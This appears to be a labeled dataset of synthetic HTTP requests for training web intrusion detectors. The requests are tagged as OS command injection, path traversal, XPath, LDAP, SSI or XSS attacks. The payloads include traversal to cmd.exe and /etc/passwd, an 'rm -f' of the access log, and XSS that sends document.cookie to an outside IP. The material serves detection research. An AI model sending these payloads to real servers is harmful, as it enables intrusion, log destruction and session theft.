MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic T3phSWlyczozeWU3
Range: 516737-,3-
Referer: /vgiHint6/kegil/f8dif/oldira.aspx
TE: trailers,trailers
User-Agent: Mozilla/7.9 (compatible; MSIE 3.8; Linux i586; eZcsT; aSoNpihr; edtmtug8ea)
UA-Pixels: 7335x113
Via: 2.4 218.153.133.41:20, eelS6/7.9 www.cAeetT3t.js, tfi/1.4 24.248.3.119
Transfer-Encoding: identity
Upgrade: Ecza/9.5
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46627
Start - Id: 44061
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 126.128.112.100
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-5, us-ascii;q=0.7, euc-cn;q=0.5, koi8-r
Accept-Encoding: *
Accept-Language: T-uae, e-tresae;q=0.1
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: Ew2ttiht=tb;aNftscfg=passwd 8;orssn=l oK|nzLtege1lys;odEseP9=3;PwherehdjH=iiirnetcat ar;cV_nppX=loLev
Cookie2: $Version="43"
Date: Thu, 22 Nov 07 02:29:19 UTC
ETag: W/"E39zcJPTTKayK1bm@"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Tue, 26 Oct 04 12:17:31 GMT
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: "XIdU6YFkNmv.RQLm9@"
Max-Forwards: 982
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -4867,66-33,-6
Referer: http://xdrxa7ui.it/g5fcna.nsf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: birwro5vmtk
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/4.5 224.153.48.167
Transfer-Encoding: compress
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 33.218.49.141
X-Serial-Number: 412280187
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44061
Start - Id: 46140
class: PathTransversal
GET /QimgI.jpg?N7znisv=+tscpvhb%40arlf&Bw0oatssietaiRo=ittssreccu&p0Sruo9t86=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Bp=ocst3+sunqh HTTP/1.1
Host: 85.40.35.24:723
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 219.211.206.215
Cookie: dymt=hxm;Ui3ya5Jrc=ftiahq1 2eihgrhttpireyx
Cookie2: $Version="5"
Date: Fri, 27 Apr 07 12:35:10 GMT
ETag: "tJuxWT97BFHkVSwXek"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 11 Jun 05 18:04:05 UTC
If-Unmodified-Since: Fri, 24 Aug 07 15:01:47 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Sep 05 18:44:33 GMT
Max-Forwards: 755
MIME-Version: 3.9
Pragma: s='ttH'
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: Basic OWJvYWJ5YWE6aGFzYXA=
Range: -526467,43-,829-431383
Referer: http://www.2dep3.be/sranti/sesdbm/rpir1/0nsw5t.asmx
TE: chunked,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: 2eXpRmN http://www.vrDft.uk
UA-CPU: x86
UA-OS: Windows NT
Via: 4.8 100.17.179.7, HTTP/7.0 58.88.126.188, ticw/5.1 www.rtlY6.shtml
Transfer-Encoding: gzip
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 678023085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46140
Start - Id: 48434
class: XPathInjection
GET /1eaebe1jeth2sr/V7.jnph-NRHyfvPAhtacces/6yot/Ry4eegm/SoU1access_logprocessing-instructionh-0MFoM0var/t2kFwklkwIj14t5ln8.png?bhblIjav9idobe=nosAasTNndytatpm&arnesnf89a=9&oqT=tScEcCwt&ahsbrttse=s&iframe1oVWwCEZa=dbiwtienh9awi&csatagnFriseslB=%5Bsi%5B&tom=3680343&tcOfmsta7ne=3374116&ie=uasemtioeelnt5si&i5mDn=15gdKqv&etescehah=7184 HTTP/1.1
Host: www.tfgamaeykd.de
Connection: zz5p
Accept: audio/x-wav;q=0.1, audio/x-wav, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: maesbzsn-ohiAys;q=0.5, kIwo-ties
Cache-Control: atrroh='2he'
Client-ip: 2.201.229.218
Cookie: sedzpn=datihCoaap;2yerle=i/sse4f/uuesnt/child::node()[ position()=110]    |   1s9ff/eOei/o/child::text()[position()=24]   or  'bal0saf1'    = '
Cookie2: $Version="9"
Date: Mon, 22 Mar 04 09:01:34 UTC
ETag: W/"1xV4GK7LTXGJbC."
Expect: 100-continue
From: eusu8Tka@Tsteh.it
If-Modified-Since: Mon, 02 Oct 06 14:00:32 GMT
If-Unmodified-Since: Fri, 23 Apr 04 22:39:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0477
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: mduE3 monuocet=sdse9
Authorization: Digest uri=http://www.attirtp.com/atup/cirNxiz/odrimaec.jsp
Range: 849-343947,4-,-41
Referer: /yoist7be/aRnan/3hol3z/erihi/acoiwheg.js
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: eMliwRj http://www.tatoiee.com
UA-CPU: 68000
UA-Disp: 4869,244,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 736x8467
Via: FTP/5.1 www.oaHr.png
Transfer-Encoding: wUTao; naDFs6=ahns
Upgrade: 7eaeH/4.4
Warning: 365 193.128.98.208 "ats1" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48434
Start - Id: 44998
class: PathTransversal
GET /9YsHeq1@C7PE/k7iLGa3OYkvar/efexnvhtare/er/a_5adkV@hban/ss1yaTk/MMRaHHFP2WrV.exe?UFN.=77&esezuTatah=0463&yo0esy2=file%3A%2F%2F%2Fa%3A%2Fsf3X%2Ftee7%2Ffyirc.xml&ooTt=%28OiaoeE+hhs+nauhac HTTP/1.0
Host: 69.156.213.92
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Cookie: 3e=826111;iolo5otto=8848;tSLRD1c=738
Cookie2: $Version="7"
Date: Tue, 06 Apr 04 01:26:22 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Wed, 05 Jul 06 08:37:33 GMT
If-Match: *
If-None-Match: "mN62FTj-AKEOiZM"
If-Range: Sun, 20 Dec 09 24:08:41 CET
Max-Forwards: 8584
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Authorization: tNli ilqk=9ttrew0s
Referer: http://oamafyt.net/rytnnlfo.rar
TE: gzip,trailers
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 1.8; sy-it; rv:0.8.2) Gecko/31768502
UA-Disp: 6840,695,32
UA-Pixels: 6392x1633
Via: dvqo/5.2 www.tnTh.shtml
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44998
Start - Id: 36007
class: PathTransversal
PUT /5-_eXUlYwIZ/nA/b_I@N_VJGnkdeleteLoeval/skn/o1ebsuazTo9/e2fsdm4nreimfaa/xhPwoft6riihnasi/aAteremnenmss8roeti/sW2Ox-5@KukyWoLd0Q0z.aspx? HTTP/1.0
Content-Length: 191
Content-Language: a
Content-Encoding: compress
Content-Location: /gbnci/nirg.html
Content-MD5: aG5OaVRhbWV6amUxaHJ0bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jul 09 10:10:27 GMT
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 208.55.38.121
Connection: close
Accept: */*
Accept-Charset: euc-kr, x-mac-greek;q=0.9, utf-8, cp-932;q=0.1
Accept-Encoding: 
Accept-Language: v3-pt;q=0.9, 0at-3ydyrr1;q=0.7, oozbSi6-tQe, iyfnnht8-coueele;q=0.9
Cache-Control: no-cache
Client-ip: 186.39.176.5
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Wed, 05 Jan 05 17:39:55 GMT
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: ueoc69
From: vgkun@sTsiY.org
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Thu, 29 May 08 09:02:26 GMT
If-Match: ".kdP3jOzz_voZh-gP"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.1
Pragma: 8e='ql'
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: Digest response="b001AD8663ac586b9BBEABDeE3bAF9ed"
Range: -7612
Referer: http://www.rtbjeh.gov/isie/oan9t/gcado.jpeg
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: sirse0og (3jDZlQc-; hGEagxvIy)
UA-CPU: Sparc
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/6.7 www.aihiym.gif, nis9/2.3 140.29.51.181, FTP/0.6 180.25.204.39
Transfer-Encoding: utonch
Upgrade: 4tnu/7.8, odsAo/4.6, iuf/3.2
Warning: 960 www.tnvRrlER.gif "csw3srn4" 
X-Forwarded-For: 88.215.245.58
----: -------------------------------
~~~~~: ~~~~~~~~~~

naa3phratrItrnh=12366&osthE=|opfcn@&gnatamnE=643928618&wkx=iayl4ishcicqo&idi12ihAated=085904&mtuWlqhrtaTiO5=560678069&qxfnt=Disbt&QNxgiesX=ejp&sgbr=\WINNT\system.ini&hheNfbPm=23268168

End - Id: 36007
Start - Id: 36713
class: OsCommanding
GET /9q1_wsXE/-faiNQx6t/eRVKws/XeYJILB-vm/px36fcCpWKFq.html?am6cna=d&o7snw6teqT=ammTkh&xp_S_D%uPrE=0207929&vbvar1k=sU6&1g4SUD0=rrsjhttpsnw+uigroup+byruZ&s3aes=st59&9soedw4ruHe2h=%250arm++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++%3B&e0prOo1n=a.Av-NXGolkA&a0ou=54&8na5tkizydsea=7zEC&eot79RdtpL2D0ii=deobjectHr&oeh7ziemmat=19&hotrP@M=bhtpass&laonikiePnuhc=82554&vHdocument_KXallAVw=tmt HTTP/1.0
Host: www.2artibb.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1258;q=0.7, gb2312;q=0.7
Accept-Encoding: *;q=0.4
Cache-Control: min-fresh=91812
Date: Sat, 17 Sep 05 03:00:19 UTC
If-Match: "FJcV3lXQ7Ga-m@FAL"
Max-Forwards: 7
Referer: /taopli/s0Gasihi.exe
User-Agent: wIwd98mf7p http://www.8u3m.it
Transfer-Encoding: 45a7

null

End - Id: 36713
Start - Id: 49847
class: XPathInjection
GET /tf1uUb5oxT.lk6E4m/nullcautoexec/eyRDrC-W0OTK/rwCQ3NSI7G84Qw.sh?yeeu=1393942&rNfNxoKO=xsb57&eFt4snyhrri=rJbbzj-UakYK&yhdoadt=crtmeij%27++or+++pOS%2Fxuix%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D934%5D++++or+++++%27wtd5h8m%27+%3D+%27&vt=ls7nmIoepoteorn&hsdun6=ead&nlde=%3Db&oyeoicp6=anlnRxsittotoen&3e=0Qu&ojye4AuThtRi=847565 HTTP/1.1
Host: www.aiqeepa.org:80
Connection: keep-alive
Accept: video/mpeg, audio/*, application/x-tar
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ouiia-eiie;q=0.6
Cache-Control: max-age=6
Client-ip: 236.200.66.115
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 06:01:58 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: ackeIlr=n1aE
From: ohlydam@WdehaAi.biz
If-Modified-Since: Mon, 22 Aug 05 16:28:36 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: *
If-Range: "lAYvHJzhWGqTjWDvS"
Max-Forwards: 729
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: i0phE o2nl=eewznpi
Range: 98475-041,374-
Referer: http://www.drwohse.de/dbbyoi3e/76n6jur/oBh6e/ttlh4/wnttho.mdb
TE: deflate
Trailer: If-Modified-Since
User-Agent: pHSBRwBKbm http://www.e1htz.com
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 967x245
Via: 8.6 94.54.172.124, HTTP/2.2 www.ohauAtrk.html:043, ainsta/1.4 www.OtiNEe1.gif
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 490 229.47.175.202 "enpes8N" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49847
Start - Id: 47435
class: XSS
GET /iw6lNmDxmJw-E-d_/8oe/oyJq7OKu-ZCa/h9ln0haesEs/oaphn.gif?EitN5nedi=Ucm&en2ndtetexiouo=1&ibf9maadirouaif=gEPhnitehsg&h0ia7=%3Ca++href+++%3D+%22++++javas%26%2399%3Bript%26%2335%3B%5Balert++++%28%27r5f%27%29%3B%5D+++%22++%3E&yes=deletem%3Cssa7&@acceptbinAHMIZknCp=7&rvUlinkseftplCconnect=07110&@tbDwp-phpIYlqO=Ow&Bbbeet=19&dmoozlleaGhmtf=unwteea&e73ema9f0s9ite=tthaax4p&sr8STi=s%3Ceh%3CEi3+e7d%3Em+4hn&uVli=apa HTTP/1.1
Host: www.cehB.net:80
Connection: close
Accept: application/rtf, application/postscript;q=0.1, video/quicktime;q=0.6
Accept-Charset: iso-8859-8-i;q=0.9, x-mac-roman;q=0.7
Accept-Encoding: 
Accept-Language: ra-Erce;q=0.5
Cache-Control: no-cache
Client-ip: 150.26.240.194
Cookie: ip6eenaeehpt= le;XB2tVQKvoreplace=errs
Cookie2: $Version="05"
Date: Fri, 30 Jun 06 11:40:29 UTC
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Wed, 27 Oct 04 12:08:11 UTC
If-Match: *
If-None-Match: "bKL2lx@h0WK9PGcNzi"
If-Range: Fri, 19 Jun 09 18:29:02 UTC
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 13744-31405
Referer: /eqly6/ptoDtwce.msf
TE: chunked
Trailer: If-Range
User-Agent: ejnedtHh (fip89I; spbWTO9.; oSaut2v)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 2.7 www.esineboj.gif, 2.9 193.87.222.72, HTTP/2.0 www.senp.html
Transfer-Encoding: neR6
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47435
Start - Id: 47231
class: XSS
GET /i-kb8JEM-5zP/eesna7ebnzEmodi/chestUtndtmnght0/i2b.jpeg?sX8aohcb=tih%28&uoeeoi=ofmonwuueot4ih&oeoeis6ukIyfpyn=%3Cimg+src%3D%22++en+++%22onmouseover+%3D%22+++%5Bwindow.open%28%27http%3A%2F%2F186.200.202.234%2Fanatar.asp%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&seainyhaTeaE=n&NE9ohriiwh=fhtdeo&sn=9ap6sosh HTTP/1.1
Host: www.HaheOnau.cz:2882
Connection: gehkowe
Accept: text/html, audio/x-wav, audio/x-wav
Accept-Charset: x-mac-roman;q=0.7
Accept-Encoding: *
Accept-Language: hja-ic3;q=0.3, i69wtsit-ey, ojlo-8eeDs, atyI2n7e-norSe;q=0.7
Cache-Control: no-store
Client-ip: 226.163.167.76
Cookie: dobdiuhuham=11eacxxp4;eA5io=oUypbGUQqJ5;ipnTag3s0=sjcY;WNdtZ=r_awIqSuH8-;1jaopLsvWsEsG=%ha1ibgsound:6t$S;0zm0=ee5 ]&/t?EwA$ ty0
Cookie2: $Version="371"
Date: Thu, 01 May 08 09:37:26 CET
ETag: "RjnuhwPFZ.d.Sbq"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Sun, 13 Sep 09 09:37:13 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Apr 10 23:20:28 GMT
Max-Forwards: 5
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: nhwoDd De9cs=naEoj
Range: 642-53334
Referer: /encnmEer.wav
TE: chunked,chunked;q=0.7
Trailer: TE
User-Agent: itTeaNemd0A6b7u
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 www.3ett6.jpg, 0.9 73.56.31.83, HTTP/1.2 www.shuamr.js
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47231
Start - Id: 37585
class: LdapInjection
POST /x9WhjWjrUjmhWiUY8/etetiescfnt4eobprr/pyoLOrvqS6z7MZ/D2hiitl/X6C1inputHt6PQall.1.shtml? HTTP/1.1
Content-Length: 313
Content-Language: LlsivoT
Content-Encoding: identity
Content-Location: /godoo/Sioo.msf
Content-MD5: bmV0eGxyeWllcm5uaHAzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Mon, 09 Feb 09 18:44:30 GMT
Host: www.Eugaft.biz
Connection: jesn
Accept: */*;q=0.6
Accept-Charset: iso-8859-5;q=0.0
Accept-Encoding: deflate, compress, deflate, gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 155.85.242.243
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="5"
Date: Fri, 22 Jan 10 22:49:41 UTC
ETag: "6MG6w5h6pZ3OwhM8oed"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Wed, 21 Nov 07 07:35:36 UTC
If-Unmodified-Since: Tue, 06 Jan 09 23:10:36 GMT
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Sun, 17 Dec 06 12:50:19 UTC
Max-Forwards: 2246
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 9-357
Referer: /tnofri3a.jpeg
TE: deflate;q=0.6,chunked
Trailer: TE
User-Agent: abUCb_ http://www.cmcmetm.de
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: HTTP/7.6 40.145.238.130, Ieeeto/5.5 www.clbf.htm, 9.8 www.i69or.js:58
Transfer-Encoding: deflate
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 403 254.22.140.185:97 "tfj3g2" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l2es2nbe1yosg=lonydinnciy aoN&Iwsds=nph-uh&Uhe=4Emlhtin&obsc77sgL=un__FeokDJO&fkhwOn=2r+b&nkdI7a=mtPspr1ccthnaense&aawt6oma=423473064&wou5lruTl=u~c&pdeldc=f6wuexec&n3asweou33bc=6908&en4adatd=")(targetfilter=(o=NetscapeRoot))&-F1RKusAeNs=op7Binrc&sfxto=lKJW-.g&Hfpx.N=\ceek&aeetnmtEt38=843054

End - Id: 37585
Start - Id: 40422
class: SSI
PUT /tP2TKQK2DUUXFX.079zt/nejvEy8BQyk/uuU@OCdXuLrO_7feljj-/escoohoyrnilt2fnort/lc5r.qPwMIj.png? HTTP/1.1
Content-Length: 154
Content-Language: o,1
Content-Encoding: compress
Content-Location: /5kgye/ytugbex/hsnu/nioen/lmvs.dll
Content-MD5: bWltdG8zeU5iZzR3YXRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 05:03:36 GMT
Last-Modified: Mon, 05 Oct 09 03:14:16 UTC
Host: www.EatigVps.it:80
Connection: sIegdW
Accept: */*
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: identity;q=0.8, identity;q=0.5, gzip
Accept-Language: oeh2ta-djounlu, aHo-s
Cache-Control: max-age=31096
Client-ip: 41.5.190.224
Cookie: aereerew=932;n91T-MFsn2=ix9et;bf=bPtas81rHeie;5t9fEs=8767303125;fiann=gfeo11Otrasa;ni9eToe2rye4cf=]oSie
Cookie2: $Version="70"
Date: Sun, 15 Mar 09 16:42:18 UTC
ETag: "N1-2Eu5WhkTGaOkON"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Tue, 13 Jan 04 01:51:05 CET
If-Unmodified-Since: Mon, 28 Aug 06 02:52:15 UTC
If-Match: "MZS7axyKfcMF7l_CPa"
If-None-Match: *
If-Range: *
Max-Forwards: 637
MIME-Version: 6.8
Pragma: nn9=t6rl0reu
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic cnlpbTM6bmlycmVF
Range: 11-84,2848-,953675-
Referer: http://www.ebim.org/Spoe/AilmoSif.dll
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.5 (Windows; U; Win98 6.5; nt-I9; rv:7.3.9) Gecko/07556190
UA-CPU: 68000
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 808x844
Via: 0.3 158.158.244.222
Transfer-Encoding: compress
Upgrade: ufb/8.5, d45i3/7.9
Warning: 529 www.od0axrnr.html:377 "crrssos" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

bOya250=access_logl8D&G.ED=353&1nrs5hezo=<!-- #include     virtual="d:\windows\autoexec.bat"-->&xfWcgaeselttho=rrfdeetaieceeLexmo&O4=0

End - Id: 40422
Start - Id: 46902
class: XSS
POST /jvtEafehms.gif? HTTP/1.0
Content-Length: 305
Content-Language: lhahf,o
Content-Encoding: gzip
Content-Location: http://gFhnfEiI.biz/U6e6.jsp
Content-MD5: bjB0aXdpZHlzMWhiNnVBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 09 19:12:07 UTC
Last-Modified: Fri, 06 Feb 04 15:49:03 GMT
Host: www.ehongem.uk
Connection: uzeaA
Accept: */*;q=0.3
Accept-Charset: iso-8859-4;q=0.7, iso-8859-8;q=0.1, koi8;q=0.3
Accept-Encoding: *
Accept-Language: rnT2nta0-U;q=0.5, nrm22s1-tcssnoue;q=0.3, jHzu-weOs;q=0.0
Cache-Control: no-cache
Client-ip: 216.37.168.1
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Thu, 01 Dec 05 01:47:15 GMT
ETag: "t@UnAXUQXOo_-9kX"
Expect: rezd8=ae1nY;5le1igo=1iciVsnl
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 27 May 04 13:50:00 UTC
If-Unmodified-Since: Wed, 02 Jul 08 05:43:06 GMT
If-Match: "dxd-FIu@Ml7doqaWd"
If-None-Match: *
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 119
MIME-Version: 9.1
Pragma: Rolclshy=Be0EC
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: /foaehld/lark.mpeg
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 4.7; lv-8g; rv:9.5.0) Gecko/38727369
UA-CPU: MIPS
UA-Disp: 802,874,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

kogternhrResto=rdTtcs5Ohie3phi9e&eT%ulibfpOTc=nlIw&tqz1vo5h=aor0y18xo&heFsrieeel=aabtebqy&Uta4nrsbw5no=519442&iframeNc6Rusrs5=eon&rcpcYwBGuY@=%3Cimg+++++src+++%3D%22+tenengnses%22onmouseover+%3D++++%22+++%5Bwindow.open%28%27http%3A%2F%2F79.134.52.223%2Fasinel.mdb%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E

End - Id: 46902
Start - Id: 37432
class: LdapInjection
GET /eEGVJ3NBq0Y/idiwPW7@iX7Cm/tgQB.h/asetslkte/a9/mdwsFpDaCnBuA/yJHH/beSnln/5KyAUB9wjg9LFYEHRY6e.jpeg?haatteei0n=+%5C+th%3B6f+et4i&a7eori=2675256&4d=giasE&aofdtzaceQyim=tudaieue&M6DYtxO4xp_=1306&oeSardavwsPD=18usriIifbtn&nteBdT=tmedT8nletEtsSe&qlssssmDmHedh4=rMlHkP&tiuesRrahMbtigL=sCLr&q72Qaa=36912&dz=3642 HTTP/1.1
Host: 179.252.47.72:80
Connection: close
Accept: application/zip;q=0.6, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 69.34.202.23
Cookie: xp_VYoTrPIVrm=r5&;upil7=6634)(&(objectClass=soR)(|(sn  =4l)(cn=u   J*));scriptoqXLnU03=n;leiunheyhtkltoi=xk5Cr2OY;1Emaa2obkt=&fromddoqm l7wte~sz 0a
Cookie2: $Version="575"
Date: Sun, 14 Mar 10 21:42:30 GMT
ETag: "G2EJ3@RTM8gcxw89mCd7"
Expect: arews19T
From: atarlip@e8r6llry.be
If-Modified-Since: Mon, 10 Jan 05 02:26:37 GMT
If-Unmodified-Since: Mon, 15 Dec 08 12:52:54 CET
If-Match: "5ZCqhsBo6maO25DQ"
If-None-Match: *
If-Range: *
Max-Forwards: 4294
MIME-Version: 0.7
Pragma: r4awl=i0xxd
Proxy-Authorization: NTLM dDMzZW5kemh0ZHNpbGNlb2Q0aGFsaXlnaWEzOFRvN25F
Authorization: ygiwer ot1drl=slFrtiym
Range: -35593,-698,-52148
Referer: http://rplhOh.st/t1tyij/gOestas/ttwe/3njlju.cgi
TE: deflate,trailers
Trailer: Authorization
User-Agent: zPsEPC http://www.Mpnacws.it
UA-CPU: 68000
UA-Disp: 7901,3624,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7873x595
Via: 0.7 60.98.17.198
Transfer-Encoding: compress
Upgrade: tsUg/3.0, gimoE/9.9
Warning: 328 46.107.172.244:13 "5tYNejmdwhs9lNi1" 
X-Forwarded-For: 50.151.186.172
X-Serial-Number: 662203541237
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37432
Start - Id: 37227
